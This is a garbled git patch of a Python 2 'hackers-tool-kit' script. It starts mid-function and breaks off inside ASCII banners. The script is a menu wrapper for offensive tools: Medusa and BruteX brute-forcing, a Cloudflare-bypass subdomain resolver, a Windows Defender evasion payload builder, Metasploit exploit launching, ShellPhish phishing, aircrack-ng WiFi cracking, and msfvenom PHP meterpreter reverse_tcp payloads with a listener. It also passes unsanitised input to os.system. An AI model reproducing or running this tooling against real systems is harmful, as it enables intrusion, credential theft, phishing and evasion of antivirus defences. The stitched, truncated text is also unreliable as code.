md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() - - if len(jerar)==0: - print "" - print " Not Found." - elif len(jerar)>2: - jerar.sort() - print "" - print "Possible Hashs:" - print "[+] ",algorithms[jerar[0]] - print "[+] ",algorithms[jerar[1]] - print "" - print "Least Possible Hashs:" - for a in range(int(len(jerar))-2): - print "[+] ",algorithms[jerar[a+2]] - else: - jerar.sort() - print "" - print "Possible Hashs:" - for a in range(len(jerar)): - print "[+] ",algorithms[jerar[a]] -#------------------# -#FIND HASH TYPE END# - - -#RESTART SCRIPT START# -#--------------------# -def restart(): - os.system("clear") - os.system("cd /root/hackers-tool-kit && python htk.py") -#------------------# -#RESTART SCRIPT END# - - -#MEDUSA AUTOMATED START# -#----------------------# -def medusa(): - k = raw_input("Target Host: ") - u = raw_input("User: ") - p = raw_input("Wordlist: ") - os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") - print "\n" - m = raw_input("Module: ") - n = raw_input("Port: ") - a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) - os.system(a) -#--------------------# -#MEDUSA AUTOMATED END# - - -#WAF DETECTER START# -#------------------# -def wafwoof(): - j = raw_input("Enter Target: ") - k = 'wafw00f {0}'.format(j) - os.system(k) -#----------------# -#WAF DETECTER END# - - -#CLOUDFLARE BYPASS START# -#-----------------------# -def cloud(): - - subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] - - print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") - - host = raw_input("Enter Target: ") - for sublist in subdomainlist: - try: - hosts = str(sublist) + "." + str(host) - showip = socket.gethostbyname(str(hosts)) - print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) - except: - pass - - print ( '\033[93m' + "Credit Goes To: tugrulbey.com") - print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") -#---------------------# -#CLOUDFLARE BYPASS END# - - -#BRUTEFORCE ALL SERVICES ON WEB START# -#------------------------------------# -def brutex(): - k = raw_input("Target: ") - p = raw_input("Port: ") - a = 'brutex {0} {1}'.format(k,p) - os.system(a) -#----------------------------------# -#BRUTEFORCE ALL SERVICES ON WEB END# - - -#METERPRETER HELP MENU START# -#---------------------------# -def methelp(): - os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") -#-------------------------# -#METERPRETER HELP MENU END# - - -#WINDOWS DEFENDER BYPASS START# -#-----------------------------# -def winbyp(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - pay = raw_input("Payload: ") - port = raw_input("Port: ") - name = raw_input("File Name: ") - os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') - os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) - os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') - os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) - os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) - os.system('echo "run\n" >> winbyp.rc') - os.system("service postgresql restart") - os.system('msfconsole -r winbyp.rc') - os.system('rm -rf winbyp.rc') -#---------------------------# -#WINDOWS DEFENDER BYPASS END# - - -#USE A EXPLOIT START# -#-------------------# -def exploit(): - os.system("cat /root/hackers-tool-kit/tools/exploits.txt") - print "\n" - f = raw_input("Select Exploit: ") - os.system('echo "use {0}\n" >> exploit.rc'.format(f)) - os.system('echo "show options\n" >> exploit.rc'.format(f)) - os.system("service postgresql restart") - os.system('msfconsole -r exploit.rc') - os.system('rm -rf exploit.rc') -#-----------------# -#USE A EXPLOIT END# - - -#PHISHING AUTOMATED START# -#------------------------# -def phish(): - os.system("bash /root/shellphish/shellphish.sh") -#----------------------# -#PHISHING AUTOMATED END# - - -#LIST DATABASE INFO START# -#------------------------# -def datalist(): - os.system('echo "hosts\n" >> data.rc') - os.system('echo "services\n" >> data.rc') - os.system("service postgresql restart") - os.system('msfconsole -r data.rc') - os.system('rm -rf data.rc') -#----------------------# -#LIST DATABASE INFO END# - - -#ALL METASPLOIT EVASIONS START# -#-----------------------------# -def msfev(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show evasion'""") -#---------------------------# -#ALL METASPLOIT EVASIONS END# - - -#FULLY UPDATE YOUR OS START# -#--------------------------# -def upgrade(): - os.system("apt update && apt upgrade") -#------------------------# -#FULLY UPDATE YOUR OS END# - - -#USE A NMAP SCRIPT START# -#-----------------------# -def nscript(): - os.system("cat /root/hackers-tool-kit/tools/scripts.txt") - print "\n" - j = raw_input(G+"Select Script:\033[0m ") - k = raw_input(G+"Target:\033[0m ") - a = 'nmap --script {0} {1}'.format(j,k) - os.system(a) -#---------------------# -#USE A NMAP SCRIPT END# - - -#GET HOST SSH VERSION START# -#--------------------------# -def sshver(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - b = raw_input(G+"Timeout: \033[0m") - os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') - os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) - os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) - os.system('echo "show options\n" >> sshver.rc') - os.system('echo "run\n" >> sshver.rc') - os.system("service postgresql restart") - os.system('msfconsole -r sshver.rc') - os.system('rm -rf sshver.rc') -#------------------------# -#GET HOST SSH VERSION END# - - -#USE PROXYCHAINS FOR WEB START# -#-----------------------------# -def chains(): - h = raw_input("Enter Browser: ") - j = raw_input("Enter Website: ") - a = 'proxychains {0} {1}'.format(h,j) - os.system(a) -#---------------------------# -#USE PROXYCHAINS FOR WEB END# - - -#GET HOST MYSQL VERSION START# -#----------------------------# -def mysqlv(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') - os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) - os.system('echo "show options\n" >> mysqlv.rc') - os.system('echo "run\n" >> mysqlv.rc') - os.system("service postgresql restart") - os.system('msfconsole -r mysqlv.rc') - os.system('rm -rf mysqlv.rc') -#--------------------------# -#GET HOST MYSQL VERSION END# - - -#CONNECT TO A HOST START# -#-----------------------# -def connect(): - h = raw_input("Enter Host: ") - print "\n" - print " How would you like to connect?" - print "---------------------------------------" - print "ssh: Secure Shell | Default Port = 22" - print "---------------------------------------" - print "telnet: Network Virtual Terminal | Default Port = 23" - print "---------------------------------------" - j = raw_input("Select Protocol: ") - a = '{0} {1}'.format(j,h) - os.system(a) -#---------------------# -#CONNECT TO A HOST END# - - -#ABOUT ME / THE CREATOR START# -#----------------------------# -def about(): - print "\033[92m------------------------------------------------------------" - print "|\033[0m Instagram: @unkn0wn_bali [\033[93mMost Active\033[0m] \033[92m|" - print "------------------------------------------------------------" - print "|\033[0m Twitter: i dont use it that much so i dont even know it \033[92m |" - print "------------------------------------------------------------" - print "|\033[0m Facebook: i dont use it that much so i dont even know it \033[92m|" - print "------------------------------------------------------------" - print "| \033[0mSnapchat: message me on instagram and i'll consider it\033[92m |" - print "------------------------------------------------------------\033[0m" -#--------------------------# -#ABOUT ME / THE CREATOR END# - - -#OPEN NEW TERMINAL START# -#-----------------------# -def terminal(): - os.system("gnome-terminal") -#---------------------# -#OPEN NEW TERMINAL END# - - -#AIRCRACK-NG [WIFI HACK] AUTOMATED START# -#---------------------------------------# -def aircrack(): - b = raw_input(G+"BSSID: \033[0m") - e = raw_input(G+"ESSID: \033[0m") - w = raw_input(G+"Wordlist: \033[0m") - h = raw_input(G+"Handshake file: \033[0m") - os.system("iwconfig") - i = raw_input(G+"Interface: \033[0m") - a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' - os.system(a) -#-------------------------------------# -#AIRCRACK-NG [WIFI HACK] AUTOMATED END# - - -#GET SOURCE CODE OF WEB START# -#----------------------------# -def source(): - t = raw_input(B+"Target:\033[0m ") - print Y+"\nWould you like to save source code in a file?\n\033[0m" - q = raw_input(R+"[y/n]:\033[0m ") - if q == "n": - an = 'curl {0}'.format(t) - os.system(an) - if q == "y": - ay = 'curl {0} >> /root/{1}.txt'.format(t,t) - os.system(ay) - print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) -#--------------------------# -#GET SOURCE CODE OF WEB END# - - -#WEB DIRECTORY SCAN START# -#------------------------# -def dirscan(): - t = raw_input(B+"Target URL:\033[91m ") - print "\033[0m" - a = 'dirb {0}'.format(t) - os.system(a) -#----------------------# -#WEB DIRECTORY SCAN END# - - - -#APACHE SERVER START# -#-------------------# -def aserver(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - print Y+"Starting Server\033[0m..." - os.system("service apache2 start") - br = raw_input(G+"Browser: \033[0m") - a = '{0} {1}'.format(br,ipaddr) - os.system(a) - stop = raw_input("hit enter to stop server: ") - print Y+"Stopping Server\033[0m..." - os.system("service apache2 stop") -#-----------------# -#APACHE SERVER END# - - -#CLEAR ALL START# -#---------------# -def clearall(): - os.system("clear") -#-------------# -#CLEAR ALL END# - - -#RUN A FILE START# -#----------------# -def run(): - print Y+"what program do you want to run the file with Example: python" - p = raw_input(N+"Program: ") - print "\n" - print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" - print "\n" - f = raw_input("Enter File: ") - print "\n" - print Y+"would you like to add arguments when running the file [y/n]\033[0m" - yn = raw_input(G+"[y or n]: \033[0m") - if yn == "n" : - a = '{0} {1}'.format(p,f) - os.system(a) - if yn == "y" : - arg = raw_input("Enter Arguments: ") - a = '{0} {1} {2}'.format(p,f,arg) - os.system(a) -#--------------# -#RUN A FILE END# - - -#REFRESH BANNER START# -#--------------------# -def banner(): - os.system("clear") - mainbanner() -#------------------# -#REFRESH BANNER END# - - -#PHP PAYLOAD START# -#-----------------# -def phpload(): - #msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.20 LPORT=443 -o /root/phphack.php# - lhost = raw_input("LHOST: ") - lport = raw_input("LPORT: ") - filen = raw_input("File Name: ") - a = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost,lport,filen) - os.system(a) - print "\nwould you like to run this file in a multi handler?" - yn = raw_input("[y/n]> ") - if yn == "y": - os.system('echo "use exploit/multi/handler\n" >> phpload.rc') - os.system('echo "set payload php/meterpreter/reverse_tcp\n" >> phpload.rc') - os.system('echo "set LHOST {0}\n" >> phpload.rc'.format(lhost)) - os.system('echo "set LPORT {0}\n" >> phpload.rc'.format(lport)) - os.system('echo "exploit\n" >> phpload.rc') - os.system("service postgresql restart") - os.system('msfconsole -r phpload.rc') - os.system('rm -rf phpload.rc') - if yn == "n": - os.system('echo " "') -#---------------# -#PHP PAYLOAD END# - - -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# -#-------------------------------------------------------------------------------------------------# -def main(): - found = False - while not found: - x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') - if x == "?": - help() - if x == "winload" : - winload() - if x == "clear" : - os.system("clear") - mainbanner() - if x == "andload": - andload() - if x == "command": - c = raw_input("Command: ") - os.system(c) - if x == "msfcon" : - os.system("service postgresql start") - os.system("msfconsole") - if x == "set": - os.system("setoolkit") - if x == "msfven": - print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" - v = raw_input(G+"MSFVENOM: \033[0m") - os.system("msfvenom", v) - if x == "gmail" : - gmail() - if x == "insta": - insta() - if x == "fb" : - fb() - if x == "ipgrab": - ipgrab() - if x == "myip": - myip() - if x == "wifite": - wifite() - if x == "mon" : - mon() - if x == "netdev" : - netdev() - if x == "scannet": - scannet() - if x == "exit" : - import sys - print "follow \033[92m@unkn0wn_bali\033[0m on instagram" - sys.exit() - if x == "rebootl": - print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" - c = raw_input("[y/n]> ") - if c == "y" : - os.system("reboot") - if c == "n" : - os.system("clear") - mainbanner() - main() - if x == "port": - port() - if x == "info": - info() - if x == "sysinfo": - sysinfo() - if x == "msfex": - msfex() - if x == "udp": - udp() - if x == "tcp": - tcp() - if x == "syn": - syn() - if x == "msfpa": - msfpa() - if x == "msfau": - msfau() - if x == "ping" : - ping() - if x == "multih": - multih() - if x == "msfall": - msfall() - if x == "hydra" : - hydra() - if x == "cupp": - cupp() - if x == "vdir": - vdir() - if x == "monoff": - monoff() - if x == "vpn": - vpn() - if x == "vpnoff": - vpnoff() - if x == "slowl": - slowl() - if x == "pidox": - pidox() - if x == "specnet": - specnet() - if x == "pingen": - pingen() - if x == "reaver": - reaver() - if x == "deauth": - deauth() - if x == "macc": - macc() - if x == "macoff": - macoff() - if x == "arpspoof": - arpspoof() - if x == "sslscan": - sslscan() - if x == "payload": - payload() - if x == "crunch": - crunch() - if x == "traff": - traff() - if x == "resa": - resa() - if x == "resu": - resu() - if x == "hashid": - hashid() - if x == "restart": - restart() - if x == "medusa": - medusa() - if x == "wafwoof": - wafwoof() - if x == "cloud": - cloud() - if x == "brutex": - brutex() - if x == "methelp": - methelp() - if x == "winbyp": - winbyp() - if x == "exploit": - exploit() - if x == "phish": - phish() - if x == "datalist": - datalist() - if x == "msfev": - msfev() - if x == "upgrade": - upgrade() - if x == "nscript": - nscript() - if x == "sshver": - sshver() - if x == "chains": - chains() - if x == "mysqlv": - mysqlv() - if x == "connect": - connect() - if x == "about": - about() - if x == "terminal": - terminal() - if x == "aircrack": - aircrack() - if x == "source": - source() - if x == "dirscan": - dirscan() - if x == "aserver": - aserver() - if x == "clearall": - clearall() - if x == "run": - run() - if x == "banner": - banner() - if x == "phpload": - phpload() - found = True -mainbanner() -main() -#-------------------------------------------------------------------------------------------------# -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From f5837e521f39b59c76a7a9d44c100eb935e8ca68 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sun, 19 May 2019 23:48:38 +0100 Subject: [PATCH 135/214] Add files via upload --- htk.py | 2805 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 2805 insertions(+) create mode 100644 htk.py diff --git a/htk.py b/htk.py new file mode 100644 index 0000000..63cb10e --- /dev/null +++ b/htk.py @@ -0,0 +1,2805 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @unkn0wn_bali +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @unkn0wn_bali +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +#this is the loading screen \ the imports START# +#----------------------------------------------# +import os +print "Starting hackers-tool-kit... [ * ]-[0%]" +import platform +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[5%]" +import webbrowser +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[9%]" +import hashlib +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[14%]" +import subprocess +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[19%]" +import zipfile +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[23%]" +import colorama +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[25%]" +from modules import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[26%]" +import modules.colors +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[27%]" +import builtwith +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[29%]" +from urllib2 import urlopen +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[31%]" +from urllib2 import URLError +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[34%]" +from urllib2 import HTTPError +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[38%]" +from urllib import urlencode +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[39%]" +from plugins.DNSDumpsterAPI import DNSDumpsterAPI +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[41%]" +import whois +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[45%]" +import json +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[47%]" +from urlparse import urlparse +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[50%]" +from re import search, sub +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[55%]" +import cookielib +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[56%]" +import socket +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[59%]" +from scapy.all import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[60%]" +from threading import Thread, active_count +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[63%]" +import random +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[67%]" +import string +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[70%]" +import signal +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[73%]" +import ssl +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[79%]" +import argparse +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[83%]" +import sys +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[86%]" +import socks +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[89%]" +import mechanize +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[90%]" +import requests +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[94%]" +import time +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[96%]" +from datetime import datetime +now = datetime.now() +hour = now.hour +minute = now.minute +day = now.day +month = now.month +year = now.year +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[99%]" +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +Gb = random._urandom(20000) +bytes = random._urandom(20000) +Kb = random._urandom(20000) +#COLOR VARIABLES START# +#---------------------# +r = '\033[31m' +W = '\033[90m' +R = '\033[91m' +N = '\033[0m' +G = '\033[92m' +B = '\033[94m' +Y = '\033[93m' +LB = '\033[1;36m' +P = '\033[95m' +Bl = '\033[30m' +O = '\033[33m' +p = '\033[35m' +#-------------------# +#COLOR VARIABLES END# + +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" +os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @tuf_unkn0wn\a'") +os.system("service tor start") +os.system("service postgresql start") +os.system("clear") +#----------------------------------------------# +#this is the loading screen \ the imports END# + + +#MAIN STARTING BANNER START# +#--------------------------# +def mainbanner1(): + os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") + print N+"""\033[34m + .............. \033[0mtype ? for help\033[34m + ..,;:ccc,. + ......''';lxO. + .....''''..........,:ld; + .';;;:::;,,.x, + ..'''. 0Xxoc:,. ... + .... ,ONkc;,;cokOdc',. + . OMo ':ddo. + dMc :OO; + 0M. .:o. + ;Wd + ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m + ,d0Odlc;,.. + ..',;:cdOOd::,. + .:d;.':;. + 'd, .' + ;l .. + .o + c + .' + .\033[92m + ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ + ██ ██ ▀▀▀██▀▀▀ ██ ██▀ + ██ ██ ██ ██▄██ + ████████ ██ █████ + ██ ██ █████ ██ █████ ██ ██▄ + ██ ██ ██ ██ ██▄ + ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m + ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ + ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ + ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + """.decode('utf-8') +def mainbanner2(): + print """\033[92m + ▄█ ▄█ ▄█ + ███ ███ ███ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███ ███ ███ + ███ ███ ███ + █▀ █▀ █▀ + + ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ + ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m + ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ + ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m + │ │ ││ ││───├┴┐│ │ + ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m +Created By @tuf_unkn0wn + """.decode('utf-8') +def mainbanner3(): + print """\033[91m + ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ + ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ + ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ + ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ + ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ + ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ + ░░ ░▒ ░ ░░ ░▒ ░ + ░ ░ ░ ░ + ░ ░ ░ ░ + \033[90m + + ████████████████████ + ██ ██\033[91m + ▒▒ ▒▒ + ░░ ░░ + ░ ░ + ░ ░\033[0m + +888 888 88888888888 888 d8P +888 888 888 888 d8P +888 888 888 888 d8P \033[1;36m +8888888888 888 888d88K +888 888 888 8888888b\033[0m +888 888 888888 888 888888 888 Y88b +888 888 888 888 Y88b +888 888 888 888 Y88b + Created By @tuf_unkn0wn On Instagram + """.decode('utf-8') +def mainbanner4(): + print P+""" + .S S. sdSS_SSSSSSbs .S S. + .SS SS. YSSS~S%SSSSSP .SS SS. + S%S S%S S%S S%S S&S + S%S S%S S%S S%S d*S + S%S SSSS%S S&S S&S .S*S + S&S SSS&S S&S S&S_sdSSS + S&S S&S S&S S&S~YSSY%b + S&S S&S S&S S&S `S% + S*S S*S S*S S*S S% + S*S S*S S*S S*S n& + S*S S*S S*S S*S wS& + SSS S*S S*S S*S 0 SS + h SP SP SP n + a Y Y Y k + c n + k e r s - t o o l - k i t by @tuf_u\033[0m + """.decode('utf-8') +def mainbanner5(): + print R+""" + ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ + ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ + ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ + ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ + ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ + ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ + ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ + ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ + ░\033[0m + .,,,,,,,,,,.,,,.....,........................... + ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, + ..,......,.....,,.,........,,...........,,.,.... + ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ + ***********************//***/***//**/********** + ****************** ****************** @tuf_unkn0wn + *,*****,*,******** ***,************** + **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** + ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, + ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, + ***********************************************\033[91m + + ▄████▄ █ ██ ▄▄▄█████▓ ██████ + ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ + ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ + ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ + ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ + ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ + ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ + ░ ░░░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ + ░ \033[0m + """.decode('utf-8') +def mainbanner6(): + print """ + |-|____________________ + /|_|_\ /__,''___ /____ /| + |\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| + |``````|_________|`````| | + | \033[93m~~~~~~~~~~~~~~\033[0m | | + | .-/\-, | | + | _\\//_ | | + | \033[92m| /(_)|\033[0m | | + |\033[92m_______|_||.-.|_______\033[0m|/| + |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| + |\033[92m```````|_||:_)|```````\033[0m| | + | \033[92m|______| \033[0m| | + | ______ | | + | (__\033[90m24\033[0m__) | | + | ~~~~~~~~ | | + | By @tuf_unkn0wn | | + |______________________|/ + \033[91m + ) ( ) ( + ( /( )\ ) ( /( )\ ( ( ( + )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( + ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ + | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) + | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< + |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ + |___/ + \033[90m + ) + (\033[33m + _ \033[0m___________ \033[90m)\033[33m + [_[\033[0m___________\033[91m#\033[0m + """.decode('utf-8') +def mainbanner7(): + os.system("cat /root/hackers-tool-kit/tools/skull.txt") +def mainbanner8(): + print """\033[91m +@@@ /$$ /$$ @@@ +@@@ | $$ | $$ @@@ +@@! | $$ | $$ @@! +!@! | $$$$$$$$ !@! +!!@ | $$__ $$ !!@ +!!! | $$ | $$ !!! +!!: | $$ | $$ !!: +:!: |__/ |__/ :!: +@@@ @@@\033[94m +@@@ @@@ +@@! @@! +!@! /$$$$$$$$ !@! +!!@ |__ $$__/ !!@ +!!! | $$ !!! +!!: | $$ !!: +:!:---------------| $$---------------:!: +@@@ | $$ @@@ +@@@ | $$ @@@ +@@! |__/ @@! +!@! !@!\033[91m +!!@ !!@ +!!! /$$ /$$ !!! +!!: | $$ /$$/ !!: +:!: | $$ /$$/ :!: +@@@ | $$$$$/ @@@ +@@@ | $$ $$ @@@ +@@! | $$\ $$ @@! +!@! | $$ \ $$ !@! +!!@ |__/ \__/ !!@ +!!! !!! +!!: !!: +:!: :!:\033[92m + :: :: +: @tuf_unkn0wn :\033[0m +""" +def mainbanner9(): + print """ +\033[91m╔\033[0m██████████████████████████████████████████████████████████████████\033[91m═╗ +║ ║ +\033[33m║ ║ +║\033[0m ▄▀▀▀▀▄ ▄▀▀▄ ▀▀▄ ▄▀▀▀▀▄ ▄▀▀▀█▀▀▄ ▄▀▀█▄▄▄▄ ▄▀▀▄ ▄▀▄ \033[33m║ +\033[93m║\033[0m █ █ ▐ █ ▀▄ ▄▀ █ █ ▐ █ █ ▐ ▐ ▄▀ ▐ █ █ ▀ █ \033[93m║ +║\033[0m ▀▄ ▐ █ ▀▄ ▐ █ █▄▄▄▄▄ ▐ █ █ \033[93m║ +\033[92m║\033[0m ▀▄ █ █ ▀▄ █ █ █ ▌ █ █ \033[92m║ +║\033[0m █▀▀▀ ▄▀ █▀▀▀ ▄▀ ▄▀▄▄▄▄ ▄▀ ▄▀ \033[92m║ 